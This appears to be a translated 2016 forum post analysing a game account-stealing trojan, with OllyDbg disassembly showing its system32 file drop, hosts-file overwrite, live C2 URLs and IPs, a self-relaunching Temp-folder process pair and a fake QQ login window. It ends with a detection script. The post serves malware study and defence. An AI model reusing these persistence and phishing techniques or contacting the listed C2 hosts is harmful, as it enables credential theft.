[Original] A rough analysis of a game account-stealing trojan
2016-11-12 15:19
http://bbs.duba.net/thread-22747123-1-1.html
I have only recently started learning trojan analysis and this is my first attempt, so there are bound to be some mistakes; in addition, the program could not go online (the server is no longer maintained). I ask the experts here to point out any errors. This is a sample I found online and am sharing with everyone (I analysed sample 2).
PS: An account-stealing trojan is a malicious program that hides on the computer. Unlike Gray Pigeon (灰鸽子), its purpose is account theft: it waits for an opportunity to steal any account that requires a password (games, applications and so on). It is a kind of online-game trojan.
Part 1: Tools needed for debugging
0x1 Virtual machine: Windows XP Service Pack 3
0x2 IDA 6.1
0x3 OllyDbg
0x4 The sample (see attachment).
Part 2: Observing the trojan's behaviour (tip: disable file sharing in the virtual machine and do not keep important data in it)
NO.1 With the virtual machine connected to the network, open a program named QQLogin.exe (renaming any program to that is enough),
open Task Manager first,
then click the sample. The sample file runs for a moment and disappears, after which two new processes appear: one is sockhelp32.exe,
the other is scansock.exe.
NO.2 With the virtual machine disconnected from the network, again open a program named QQLogin.exe (renaming any program to that is enough),
click the sample, and the same happens as before, except that the newly opened QQLogin.exe is closed and a login window appears in its place. (Unfortunately the trojan is too old and its author has stopped maintaining it,
so when online it cannot find the server and exits; regrettably I could not trace the author's e-mail.)
Part 3: Unpacking
First check with PEiD what packer was applied to the file.
Above you can see that the trojan is packed with Upack 0.28 - 0.399. How to unpack it: simple, load it in OD,
00558333 E9 22F3EFFF jmp c1.0045765A ; single-step; the lines below are handled the same way
0045765A E8 21640000 call c1.0045DA80
0045765F E9 79FEFFFF jmp c1.004574DD
004574DD 6A 58 push 0x58
004574DF 68 30E14800 push c1.0048E130
004574E4 E8 D3450000 call c1.0045BABC
then click Plugins -> OllyDump -> Dump debugged process.
Due to my limited skill this unpacking is not perfect, but it is good enough for analysis.
Part 4: Analysis (the program is the same file throughout; it only checks the current process name at runtime to execute different branches)
Drag the unpacked program, saved as dump1.exe, into IDA, and you can see:
Why does it show C++ code directly? A small trick: press F5 at some assembly code and it is decompiled into C++-like pseudocode. IDA really is a wonderful tool; this makes things clear at a glance, although nothing suspicious can be seen here yet.
Next, load our roughly unpacked program into OD.
Debugging shows that, to reach the point where the program reveals its true colours, we first need to set a breakpoint at
0046FD46 FF50 50 call dword ptr ds:[eax+0x50]
Click to select the line for the breakpoint and press F2; removing it works the same way.
Let the program run to here and stop, then press F7 to step into the function:
004108B0 55 push ebp
004108B1 8BEC mov ebp,esp
004108B3 83E4 F8 and esp,0xFFFFFFF8
004108B6 6A FF push -0x1
004108B8 68 BD4C4700 push dump1.00474CBD
004108BD 64:A1 00000000 mov eax,dword ptr fs:[0]
004108C3 50 push eax
004108C4 51 push ecx
004108C5 B8 80280000 mov eax,0x2880
004108CA E8 31B80400 call dump1.0045C100
004108CF A1 747A4900 mov eax,dword ptr ds:[0x497A74]
004108D4 33C4 xor eax,esp
004108D6 898424 7C280000 mov dword ptr ss:[esp+0x287C],eax
004108DD 56 push esi
004108DE 57 push edi
004108DF A1 747A4900 mov eax,dword ptr ds:[0x497A74]
004108E4 33C4 xor eax,esp
004108E6 50 push eax
004108E7 8D8424 90280000 lea eax,dword ptr ss:[esp+0x2890]
004108EE 64:A3 00000000 mov dword ptr fs:[0],eax
004108F4 8D4424 0C lea eax,dword ptr ss:[esp+0xC]
004108F8 50 push eax
004108F9 8BF9 mov edi,ecx
004108FB C74424 10 08000>mov dword ptr ss:[esp+0x10],0x8
00410903 C74424 14 FF000>mov dword ptr ss:[esp+0x14],0xFF
0041090B FF15 28604700 call dword ptr ds:[<&comctl32.InitCommonControls>; comctl32.InitCommonControlsEx
00410911 8BCF mov ecx,edi
00410913 E8 76450300 call dump1.00444E8E
00410918 6A 00 push 0x0
0041091A E8 FC550300 call dump1.00445F1B
0041091F 83C4 04 add esp,0x4
00410922 68 28E34700 push dump1.0047E328 ; UNICODE "DNF"
00410927 8BCF mov ecx,edi
00410929 E8 C05A0300 call dump1.004463EE
0041092E E8 4DCFFFFF call dump1.0040D880 ; drops a file (the function's internals are shown below)
Inside dump1.0040D880:
0040D880 55 push ebp
0040D881 8BEC mov ebp,esp
0040D883 81EC 60020000 sub esp,0x260
0040D889 A1 747A4900 mov eax,dword ptr ds:[0x497A74]
0040D88E 33C5 xor eax,ebp
0040D890 8945 FC mov dword ptr ss:[ebp-0x4],eax
0040D893 53 push ebx
0040D894 56 push esi
0040D895 57 push edi
0040D896 8B3D F0624700 mov edi,dword ptr ds:[<&kernel32.GetSystemDirect>; kernel32.GetSystemDirectoryA
0040D89C 68 2C010000 push 0x12C
0040D8A1 8D85 D0FEFFFF lea eax,dword ptr ss:[ebp-0x130]
0040D8A7 50 push eax
0040D8A8 FFD7 call edi ; gets the system directory
0040D8AA 8B1D 38634700 mov ebx,dword ptr ds:[<&kernel32.lstrcat>]; kernel32.lstrcatA
0040D8B0 68 28DF4700 push dump1.0047DF28 ; ASCII "\dnfset.cyc"
0040D8B5 8D8D D0FEFFFF lea ecx,dword ptr ss:[ebp-0x130]
0040D8BB 51 push ecx
0040D8BC FFD3 call ebx
0040D8BE 6A 00 push 0x0
0040D8C0 6A 00 push 0x0
0040D8C2 6A 04 push 0x4
0040D8C4 6A 00 push 0x0
0040D8C6 6A 01 push 0x1
0040D8C8 68 00000080 push 0x80000000
0040D8CD 8D95 D0FEFFFF lea edx,dword ptr ss:[ebp-0x130]
0040D8D3 52 push edx
0040D8D4 FF15 EC624700 call dword ptr ds:[<&kernel32.CreateFileA>]; drops dnfset.cyc into the system32 directory
0040D8DA 6A 00 push 0x0
0040D8DC 6A 00 push 0x0
0040D8DE 8BF0 mov esi,eax
0040D8E0 6A 00 push 0x0
0040D8E2 56 push esi
0040D8E3 FF15 E8624700 call dword ptr ds:[<&kernel32.SetFilePointer>]; kernel32.SetFilePointer
0040D8E9 6A 00 push 0x0
0040D8EB 8D85 A0FDFFFF lea eax,dword ptr ss:[ebp-0x260]
0040D8F1 50 push eax
0040D8F2 68 6C020000 push 0x26C
0040D8F7 68 28FA4900 push dump1.0049FA28 ; ASCII "http://183.60.203.82:5566/f/w11/get.asp"
0040D8FC 56 push esi
0040D8FD FF15 E4624700 call dword ptr ds:[<&kernel32.ReadFile>]; reads information from http://183.60.203.82:5566/f/w11/get.asp
0040D903 56 push esi
0040D904 8B35 20634700 mov esi,dword ptr ds:[<&kernel32.CloseHandle>]; kernel32.CloseHandle
0040D90A FFD6 call esi
0040D90C E8 2FFFFFFF call dump1.0040D840
0040D911 68 2C010000 push 0x12C
0040D916 8D8D A4FDFFFF lea ecx,dword ptr ss:[ebp-0x25C]
0040D91C 51 push ecx
0040D91D FFD7 call edi
0040D91F 68 34DF4700 push dump1.0047DF34 ; ASCII "\drivers\etc\hosts"
0040D924 8D95 A4FDFFFF lea edx,dword ptr ss:[ebp-0x25C]
0040D92A 52 push edx
0040D92B FFD3 call ebx
0040D92D 6A 00 push 0x0
0040D92F 6A 00 push 0x0
0040D931 6A 02 push 0x2
0040D933 6A 00 push 0x0
0040D935 6A 01 push 0x1
0040D937 68 00000040 push 0x40000000
0040D93C 8D85 A4FDFFFF lea eax,dword ptr ss:[ebp-0x25C]
0040D942 50 push eax
0040D943 FF15 EC624700 call dword ptr ds:[<&kernel32.CreateFileA>]; creates the hosts file in the C:\WINDOWS\system32\drivers\etc directory
0040D949 50 push eax
0040D94A FFD6 call esi
0040D94C 8B4D FC mov ecx,dword ptr ss:[ebp-0x4]
0040D94F 5F pop edi
0040D950 5E pop esi
0040D951 33CD xor ecx,ebp
0040D953 5B pop ebx
0040D954 E8 0B9D0400 call dump1.00457664
0040D959 8BE5 mov esp,ebp
0040D95B 5D pop ebp
0040D95C C3 retn
Having analysed call dump1.0040D880, let's continue:
00410933 8B35 D4624700 mov esi,dword ptr ds:[<&kernel32.GetModuleFileNa>; kernel32.GetModuleFileNameA
00410939 68 2C010000 push 0x12C
0041093E 8D8C24 18220000 lea ecx,dword ptr ss:[esp+0x2218]
00410945 51 push ecx
00410946 6A 00 push 0x0
00410948 FFD6 call esi
0041094A 8D9424 14220000 lea edx,dword ptr ss:[esp+0x2214]
00410951 68 30E34700 push dump1.0047E330 ; ASCII "sockhelp"
00410956 52 push edx
00410957 E8 E4800400 call dump1.00458A40 ; is the process name sockhelp32.exe?
0041095C 83C4 08 add esp,0x8
0041095F 85C0 test eax,eax
00410961 74 3A je short dump1.0041099D ; if it is, the jump is not taken
00410963 8B35 DC624700 mov esi,dword ptr ds:[<&kernel32.CreateThread>] ; kernel32.CreateThread
00410969 6A 00 push 0x0
0041096B 6A 00 push 0x0
0041096D 6A 00 push 0x0
0041096F 68 B0E54000 push dump1.0040E5B0
00410974 6A 00 push 0x0
00410976 6A 00 push 0x0
00410978 FFD6 call esi ; creates a thread at 0040E5B0 that obtains the host address
0041097A E8 71D6FFFF call dump1.0040DFF0 ; downloads a file from the Internet (the function's internals are shown below)
Let's look at what dump1.0040DFF0 looks like inside:
0040DFF0 55 push ebp
0040DFF1 8BEC mov ebp,esp
0040DFF3 81EC 2C090000 sub esp,0x92C
0040DFF9 A1 747A4900 mov eax,dword ptr ds:[0x497A74]
0040DFFE 33C5 xor eax,ebp
0040E000 8945 FC mov dword ptr ss:[ebp-0x4],eax
0040E003 53 push ebx
0040E004 56 push esi
0040E005 57 push edi
0040E006 68 CCDF4700 push sockhelp.0047DFCC ; ASCII "http://%d.%d.%d.%d:808/GetMeInfo.aspx"
0040E00B 8DBD D8F6FFFF lea edi,dword ptr ss:[ebp-0x928]
0040E011 E8 4AF9FFFF call sockhelp.0040D960 ; gets the host path http://218.85.65.150:808/GetMeInfo.aspx
0040E016 83C4 04 add esp,0x4
0040E019 50 push eax
0040E01A 8D85 00FEFFFF lea eax,dword ptr ss:[ebp-0x200]
0040E020 50 push eax
0040E021 FF15 3C634700 call dword ptr ds:[<&kernel32.lstrcpy>] ; kernel32.lstrcpyA
0040E027 68 F4DF4700 push sockhelp.0047DFF4 ; ASCII "?act=2"
0040E02C 8D8D 00FEFFFF lea ecx,dword ptr ss:[ebp-0x200]
0040E032 51 push ecx
0040E033 FF15 38634700 call dword ptr ds:[<&kernel32.lstrcat>] ; kernel32.lstrcatA
0040E039 8B1D 60664700 mov ebx,dword ptr ds:[<&wininet.Internet>; wininet.InternetCloseHandle
0040E03F 90 nop
0040E040 E8 7BFEFFFF call sockhelp.0040DEC0 ; likewise gets the host path
0040E045 6A 00 push 0x0
0040E047 68 00000080 push 0x80000000
0040E04C 6A 00 push 0x0
0040E04E 6A 00 push 0x0
0040E050 8D95 00FEFFFF lea edx,dword ptr ss:[ebp-0x200]
0040E056 8BF0 mov esi,eax
0040E058 52 push edx
0040E059 56 push esi
0040E05A FF15 68664700 call dword ptr ds:[<&wininet.InternetOpe>; opens a resource via http://218.85.65.150:808/GetMeInfo.aspx?act=2
0040E060 68 00040000 push 0x400
0040E065 8BF8 mov edi,eax
0040E067 8D85 D0F8FFFF lea eax,dword ptr ss:[ebp-0x730]
0040E06D 6A 00 push 0x0
0040E06F 50 push eax
0040E070 E8 CBD90400 call sockhelp.0045BA40
0040E075 83C4 0C add esp,0xC
0040E078 8D8D D4F6FFFF lea ecx,dword ptr ss:[ebp-0x92C]
0040E07E 51 push ecx
0040E07F 68 00040000 push 0x400
0040E084 8D95 D0F8FFFF lea edx,dword ptr ss:[ebp-0x730]
0040E08A 52 push edx
0040E08B 57 push edi
0040E08C C785 D4F6FFFF 0>mov dword ptr ss:[ebp-0x92C],0x0
0040E096 FF15 64664700 call dword ptr ds:[<&wininet.InternetRea>; reads data from the resource just opened
0040E09C 57 push edi
0040E09D FFD3 call ebx
0040E09F 56 push esi
0040E0A0 FFD3 call ebx
0040E0A2 80BD D0F8FFFF 6>cmp byte ptr ss:[ebp-0x730],0x6F
0040E0A9 75 19 jnz short sockhelp.0040E0C4
0040E0AB 80BD D1F8FFFF 6>cmp byte ptr ss:[ebp-0x72F],0x6B
0040E0B2 75 10 jnz short sockhelp.0040E0C4
0040E0B4 68 401F0000 push 0x1F40
0040E0B9 FF15 FC624700 call dword ptr ds:[<&kernel32.Sleep>] ; kernel32.Sleep
0040E0BF ^ E9 7CFFFFFF jmp sockhelp.0040E040
0040E0C4 8D85 D0F8FFFF lea eax,dword ptr ss:[ebp-0x730]
0040E0CA 68 FCDF4700 push sockhelp.0047DFFC ; UNICODE ";"
0040E0CF 50 push eax
0040E0D0 E8 6BA90400 call sockhelp.00458A40
0040E0D5 83C4 08 add esp,0x8
0040E0D8 85C0 test eax,eax
0040E0DA 75 10 jnz short sockhelp.0040E0EC
0040E0DC 68 401F0000 push 0x1F40 ; sleeps 8 seconds
0040E0E1 FF15 FC624700 call dword ptr ds:[<&kernel32.Sleep>] ; kernel32.Sleep
0040E0E7 ^ E9 54FFFFFF jmp sockhelp.0040E040 ; jumps back to continue the loop
Having analysed call dump1.0040DFF0, back to where we were:
0041097F 6A 00 push 0x0
00410981 6A 00 push 0x0
00410983 6A 00 push 0x0
00410985 68 40E14000 push dump1.0040E140
0041098A 6A 00 push 0x0
0041098C 6A 00 push 0x0
0041098E FFD6 call esi
00410990 E8 0BDDFFFF call dump1.0040E6A0
00410995 6A 00 push 0x0
00410997 FF15 E0624700 call dword ptr ds:[<&kernel32.ExitProcess>] ; kernel32.ExitProcess
0041099D 8D8424 14220000 lea eax,dword ptr ss:[esp+0x2214]
004109A4 68 3CE34700 push dump1.0047E33C ; ASCII "scansock"
004109A9 50 push eax
004109AA E8 91800400 call dump1.00458A40 ; is the process name scansock.exe?
004109AF 83C4 08 add esp,0x8
004109B2 85C0 test eax,eax
004109B4 74 05 je short dump1.004109BB ; if it is, the jump is not taken
004109B6 E8 65DBFFFF call dump1.0040E520 ; (details below)
Inside dump1.0040E520:
0040E520 55 push ebp
0040E521 8BEC mov ebp,esp
0040E523 81EC 30010000 sub esp,0x130
0040E529 A1 747A4900 mov eax,dword ptr ds:[0x497A74]
0040E52E 33C5 xor eax,ebp
0040E530 8945 FC mov dword ptr ss:[ebp-0x4],eax
0040E533 53 push ebx
0040E534 8B1D E4634700 mov ebx,dword ptr ds:[<&shell32.ShellExe>; shell32.ShellExecuteA
0040E53A 56 push esi
0040E53B 8B35 D0624700 mov esi,dword ptr ds:[<&kernel32.GetTemp>; kernel32.GetTempPathA
0040E541 57 push edi
0040E542 8B3D A0654700 mov edi,dword ptr ds:[<&user32.wsprintfA>; user32.wsprintfA
0040E548 EB 06 jmp short scansock.0040E550
0040E54A 8D9B 00000000 lea ebx,dword ptr ds:[ebx]
0040E550 68 3CE04700 push scansock.0047E03C ; UNICODE "sockhelp32.exe"
0040E555 E8 F6EEFFFF call scansock.0040D450 ; takes a process snapshot to check whether sockhelp32.exe is running
0040E55A 83C4 04 add esp,0x4
0040E55D 85C0 test eax,eax
0040E55F 75 38 jnz short scansock.0040E599 ; if it is not, the jump is not taken
0040E561 8D85 D0FEFFFF lea eax,dword ptr ss:[ebp-0x130]
0040E567 50 push eax
0040E568 68 2C010000 push 0x12C
0040E56D FFD6 call esi ; gets the temp folder
0040E56F 8D8D D0FEFFFF lea ecx,dword ptr ss:[ebp-0x130]
0040E575 51 push ecx
0040E576 8BD1 mov edx,ecx
0040E578 68 5CE04700 push scansock.0047E05C ; ASCII "%s\sockhelp32.exe"
0040E57D 52 push edx
0040E57E FFD7 call edi
0040E580 83C4 0C add esp,0xC
0040E583 6A 00 push 0x0
0040E585 6A 00 push 0x0
0040E587 6A 00 push 0x0
0040E589 8D85 D0FEFFFF lea eax,dword ptr ss:[ebp-0x130]
0040E58F 50 push eax
0040E590 68 7CDF4700 push scansock.0047DF7C ; ASCII "open"
0040E595 6A 00 push 0x0
0040E597 FFD3 call ebx ; runs C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\sockhelp32.exe
0040E599 68 88130000 push 0x1388
0040E59E FF15 FC624700 call dword ptr ds:[<&kernel32.Sleep>] ; kernel32.Sleep
0040E5A4 ^ EB AA jmp short scansock.0040E550 ; continues the loop
004109BB 68 48E34700 push dump1.0047E348 ; UNICODE "scansock.exe"
004109C0 E8 8BCAFFFF call dump1.0040D450 ; takes a process snapshot to check the current process
004109C5 83C4 04 add esp,0x4
004109C8 85C0 test eax,eax
004109CA 0F85 B2000000 jnz dump1.00410A82 ; jumps if it is scansock.exe; for dump.exe the jump is not taken
004109D0 68 2C010000 push 0x12C
004109D5 8D8C24 48230000 lea ecx,dword ptr ss:[esp+0x2348]
004109DC 51 push ecx
004109DD 50 push eax
004109DE FFD6 call esi
004109E0 8D9424 841E0000 lea edx,dword ptr ss:[esp+0x1E84]
004109E7 52 push edx
004109E8 68 2C010000 push 0x12C
004109ED FF15 D0624700 call dword ptr ds:[<&kernel32.GetTempPathA>] ; gets the temp directory
004109F3 8D8424 841E0000 lea eax,dword ptr ss:[esp+0x1E84]
004109FA 50 push eax
004109FB 8D8C24 E8200000 lea ecx,dword ptr ss:[esp+0x20E8]
00410A02 51 push ecx
00410A03 FF15 3C634700 call dword ptr ds:[<&kernel32.lstrcpy>] ; kernel32.lstrcpyA
00410A09 8B35 A0654700 mov esi,dword ptr ds:[<&user32.wsprintfA>] ; user32.wsprintfA
00410A0F 8D9424 E4200000 lea edx,dword ptr ss:[esp+0x20E4]
00410A16 52 push edx
00410A17 8BC2 mov eax,edx
00410A19 68 5CE04700 push dump1.0047E05C ; ASCII "%s\sockhelp32.exe"
00410A1E 50 push eax
00410A1F FFD6 call esi
00410A21 83C4 0C add esp,0xC
00410A24 8D8C24 841E0000 lea ecx,dword ptr ss:[esp+0x1E84]
00410A2B 51 push ecx
00410A2C 8BD1 mov edx,ecx
00410A2E 68 64E34700 push dump1.0047E364 ; ASCII "%s\scansock.exe"
00410A33 52 push edx
00410A34 FFD6 call esi
00410A36 8B35 A8624700 mov esi,dword ptr ds:[<&kernel32.CopyFileA>] ; kernel32.CopyFileA
00410A3C 83C4 0C add esp,0xC
00410A3F 6A 00 push 0x0
00410A41 8D8424 881E0000 lea eax,dword ptr ss:[esp+0x1E88]
00410A48 50 push eax
00410A49 8D8C24 4C230000 lea ecx,dword ptr ss:[esp+0x234C]
00410A50 51 push ecx
00410A51 FFD6 call esi ; copies itself under the name scansock.exe
00410A53 6A 00 push 0x0
00410A55 8D9424 E8200000 lea edx,dword ptr ss:[esp+0x20E8]
00410A5C 52 push edx
00410A5D 8D8424 4C230000 lea eax,dword ptr ss:[esp+0x234C]
00410A64 50 push eax
00410A65 FFD6 call esi ; copies itself under the name sockhelp32.exe
00410A67 6A 00 push 0x0
00410A69 6A 00 push 0x0
00410A6B 6A 00 push 0x0
00410A6D 8D8C24 901E0000 lea ecx,dword ptr ss:[esp+0x1E90]
00410A74 51 push ecx
00410A75 68 7CDF4700 push dump1.0047DF7C ; ASCII "open"
00410A7A 6A 00 push 0x0
00410A7C FF15 E4634700 call dword ptr ds:[<&shell32.ShellExecuteA>] ; and runs these two files
00410A82 E8 49D0FFFF call dump1.0040DAD0 ; tries to obtain the host IP from os.buyaoda.com..c4.buyaoda.com (the pages are dead, so it cannot) and creates the file dnfhack.py in the system directory
00410A87 8D9424 B41F0000 lea edx,dword ptr ss:[esp+0x1FB4]
00410A8E 52 push edx
00410A8F E8 8CCBFFFF call dump1.0040D620
00410A94 83C4 04 add esp,0x4
00410A97 8D8424 B41F0000 lea eax,dword ptr ss:[esp+0x1FB4]
00410A9E 50 push eax
00410A9F FF15 00644700 call dword ptr ds:[<&shlwapi.PathRemoveFileSpecA>; shlwapi.PathRemoveFileSpecA
00410AA5 68 74E34700 push dump1.0047E374 ; UNICODE "\"
00410AAA 8D8C24 B81F0000 lea ecx,dword ptr ss:[esp+0x1FB8]
00410AB1 51 push ecx
00410AB2 FF15 38634700 call dword ptr ds:[<&kernel32.lstrcat>] ; kernel32.lstrcatA
00410AB8 8D9424 B41F0000 lea edx,dword ptr ss:[esp+0x1FB4]
00410ABF 52 push edx
00410AC0 FF15 A4624700 call dword ptr ds:[<&kernel32.SetCurrentDirector>; kernel32.SetCurrentDirectoryA
00410AC6 68 0F040000 push 0x40F
00410ACB 8D8424 78240000 lea eax,dword ptr ss:[esp+0x2478]
00410AD2 50 push eax
00410AD3 6A 00 push 0x0
00410AD5 FF15 B4624700 call dword ptr ds:[<&kernel32.GetModuleFileNameW>; kernel32.GetModuleFileNameW
00410ADB 8D8C24 74240000 lea ecx,dword ptr ss:[esp+0x2474]
00410AE2 8DB7 A4000000 lea esi,dword ptr ds:[edi+0xA4]
00410AE8 51 push ecx
00410AE9 8BCE mov ecx,esi
00410AEB E8 003BFFFF call dump1.004045F0
00410AF0 8B06 mov eax,dword ptr ds:[esi]
00410AF2 6A 5C push 0x5C
00410AF4 50 push eax
00410AF5 E8 11890400 call dump1.0045940B
00410AFA 83C4 08 add esp,0x8
00410AFD 85C0 test eax,eax
00410AFF 74 19 je short dump1.00410B1A
00410B01 2B06 sub eax,dword ptr ds:[esi]
00410B03 D1F8 sar eax,1
00410B05 8BC8 mov ecx,eax
00410B07 83F9 FF cmp ecx,-0x1
00410B0A 74 0E je short dump1.00410B1A
00410B0C 8B16 mov edx,dword ptr ds:[esi]
00410B0E 8B42 F4 mov eax,dword ptr ds:[edx-0xC]
00410B11 41 inc ecx
00410B12 2BC1 sub eax,ecx
00410B14 56 push esi
00410B15 E8 26050000 call dump1.00411040
00410B1A 8D8424 B41F0000 lea eax,dword ptr ss:[esp+0x1FB4]
00410B21 50 push eax
00410B22 8BCE mov ecx,esi
00410B24 E8 97060000 call dump1.004111C0
00410B29 E8 72040000 call dump1.00410FA0
00410B2E 8D4C24 14 lea ecx,dword ptr ss:[esp+0x14]
00410B32 51 push ecx
00410B33 E8 18090000 call dump1.00411450
00410B38 6A 00 push 0x0
00410B3A C78424 9C280000>mov dword ptr ss:[esp+0x289C],0x0
00410B45 FF15 AC624700 call dword ptr ds:[<&kernel32.RestoreLastError>] ; ntdll.RtlSetLastWin32Error
00410B4B 8D5424 14 lea edx,dword ptr ss:[esp+0x14]
00410B4F 8BCA mov ecx,edx
00410B51 8957 20 mov dword ptr ds:[edi+0x20],edx
00410B54 E8 CD0A0300 call dump1.00441626 ; creates the fake QQ login window (the sample had been tampered with, so it is not clearly visible)
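Two behaviours in the listings above are easy to turn into detection logic: the C2 poll loop (fetch .../GetMeInfo.aspx?act=2, Sleep(0x1F40) = 8 seconds, repeat) and the scansock.exe / sockhelp32.exe pair that the sample copies to the Temp folder and that relaunch each other. The following is an added example, not code from the original post; the proxy log format, the log lines and the process list are constructed for the demonstration.

```python
"""Detection logic for two behaviours in the listings above: the beacon loop that
fetches .../GetMeInfo.aspx?act=2 and sleeps 8 s between tries, and the scansock.exe /
sockhelp32.exe pair launched from the Temp folder. Added example, not code from the
original post; the log format, log lines and process list are constructed."""
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(r"^(\S+) (\S+) (?:GET|POST) (\S+)$")  # "<ISO time> <client> <method> <url>" (assumed format)
# URL shapes come from the strings seen in the disassembly above
C2_URL_RE = re.compile(r"^http://\d{1,3}(?:\.\d{1,3}){3}:(?:808/GetMeInfo\.aspx\?act=2|5566/f/w11/get\.asp)$", re.I)
POLL_SECONDS = 8  # Sleep(0x1F40) = 8000 ms between polls
WATCHDOG_PAIR = {"scansock.exe", "sockhelp32.exe"}

def find_c2_polling(log_lines, min_hits=3, tolerance=2.0):
    """Return {(client, url): request_count} for clients that fetch a C2-shaped URL
    at least min_hits times with roughly POLL_SECONDS between consecutive fetches."""
    seen = defaultdict(list)
    for line in log_lines:
        m = LOG_RE.match(line.strip())
        if m and C2_URL_RE.match(m.group(3)):
            seen[(m.group(2), m.group(3))].append(datetime.fromisoformat(m.group(1)))
    hits = {}
    for key, stamps in seen.items():
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        periodic = sum(1 for g in gaps if abs(g - POLL_SECONDS) <= tolerance)
        if periodic + 1 >= min_hits:  # N periodic gaps mean N+1 requests
            hits[key] = len(stamps)
    return hits

def watchdog_pair_running(processes):
    """processes: iterable of (image name, full path). True when both names of the
    pair run from a Temp directory, which is where the sample copies itself."""
    in_temp = {name.lower() for name, path in processes
               if name.lower() in WATCHDOG_PAIR and "\\temp\\" in path.lower()}
    return in_temp == WATCHDOG_PAIR

SAMPLE_LOG = [  # constructed sample data
    "2016-11-12T15:19:00 10.0.0.5 GET http://218.85.65.150:808/GetMeInfo.aspx?act=2",
    "2016-11-12T15:19:08 10.0.0.5 GET http://218.85.65.150:808/GetMeInfo.aspx?act=2",
    "2016-11-12T15:19:16 10.0.0.5 GET http://218.85.65.150:808/GetMeInfo.aspx?act=2",
    "2016-11-12T15:19:17 10.0.0.7 GET http://example.com/index.html",
]
SAMPLE_PROCS = [  # constructed sample data
    ("scansock.exe", r"C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\scansock.exe"),
    ("sockhelp32.exe", r"C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\sockhelp32.exe"),
    ("explorer.exe", r"C:\WINDOWS\explorer.exe"),
]
```

Because the sample also keeps polling when the server only answers "ok", the timing pattern is a more durable indicator than the exact IP, which the author notes was already dead.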